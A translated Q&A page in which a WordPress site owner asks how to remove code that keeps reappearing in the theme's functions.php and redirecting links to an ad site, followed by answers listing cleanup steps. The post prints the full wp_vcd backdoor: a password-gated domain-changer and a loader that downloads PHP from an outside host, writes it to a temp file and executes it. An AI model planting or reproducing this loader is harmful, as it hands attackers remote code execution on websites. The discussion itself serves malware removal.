[英]WordPress site have been redirect my links to onclickads website
我不知道这是onlickads的代码每当我点击我的网站上的一些链接它重定向我在onclickads.com链接。
每次我在我的主题functions.php上删除这个代码它会一次又一次地生成这个代码..当我检查主题函数的原始文件时,这个代码不包括在内。
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
if ( ! function_exists( 'w1p_te1mp_se1tup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
{
function w1p_te1mp_se1tup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(w1p_te1mp_se1tup($tmpcontent));
}
}
}
?>
任何人都可以建议做什么或者删除我网站上的恶意软件,
谢谢。
我做了什么来解决问题:
wp-include
目录中,删除wp-vcd.php
和class.wp.php
文件 wp-include
目录中,打开post.php
并删除Malware
添加的第一个php
标记 functions.php
文件,并删除上面的代码 此onclickads.com重定向通常是由计算机上安装的广告软件引起的。 这些广告软件程序与您从Internet下载的其他免费软件捆绑在一起。
您可能不需要安装新版本,您可以通过以下步骤从您的网站中删除此类警告。
要删除onclickads.com重定向,请按照下列步骤操作:
1)从您的文件中删除了不需要的代码。
2)从Windows卸载恶意程序
3)在您的系统上使用安全软件,并在WordPress中使用安全插件,如反垃圾邮件或Wordfence
继续执行这些步骤之后,没有任何作用,那么您可以安装一个新版本并安装新版本的安全插件,以避免在将来使用时出现黑客攻击。
希望这对你有所帮助。 谢谢。
要完全删除代码,如果您使用的是子主题,则还必须同时从父主题中删除它
这是一个完整的详细解决方案,如何解决我在为受攻击的网站寻找解决方案后发现的恶意软件攻击
https://github.com/rakshitshah94/wordpress-wp-vcd-malware-attack-solution
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.